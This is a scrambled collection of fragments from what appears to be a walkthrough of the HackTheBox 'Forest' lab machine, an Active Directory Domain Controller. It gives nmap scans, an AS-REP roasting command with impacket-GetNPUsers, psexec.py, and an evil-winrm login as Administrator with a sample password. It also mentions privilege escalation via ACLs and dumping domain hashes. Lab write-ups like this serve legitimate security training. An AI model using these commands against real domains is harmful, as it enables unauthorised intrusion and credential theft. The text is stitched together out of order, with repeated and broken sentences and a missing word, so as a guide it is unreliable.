Useful commands inside rpcclient :
Guest DefaultAccount Administrator sebastien lucinda andrea santi ...
We then use the tool to gather more information about the domain.
Foothold achieved without a single brute-force password guess. forest hackthebox walkthrough best
In this walkthrough, we will cover the enumeration of a Domain Controller, exploiting a misconfiguration to gain an initial foothold, performing privilege escalation via ACLs, and finally dumping the domain hashes to capture the root flag.
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001 -sV -sC -O -oA forest_scan 10.10.10.161
BloodHound reveals that svc-account is a member of the group. Exploiting Group Policy In this walkthrough, we will cover the enumeration
Navigate to C:\Users\Administrator\Desktop and grab root.txt .
python psexec.py forest.htb/administrator@forest.htb
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users.txt -format hashcat -outputfile asreproast.hashes python psexec
Start with an aggressive Nmap scan to discover open ports and running services. nmap -sC -sV -p- -T4 -oN forest_nmap.txt 10.10.10.161 Use code with caution. Key Ports Discovered Indicates an Active Directory environment.
Once we have cracked the , we can use it to gain access to the domain.
evil-winrm -i 10.10.10.161 -u Administrator -p 'ThePassword123'
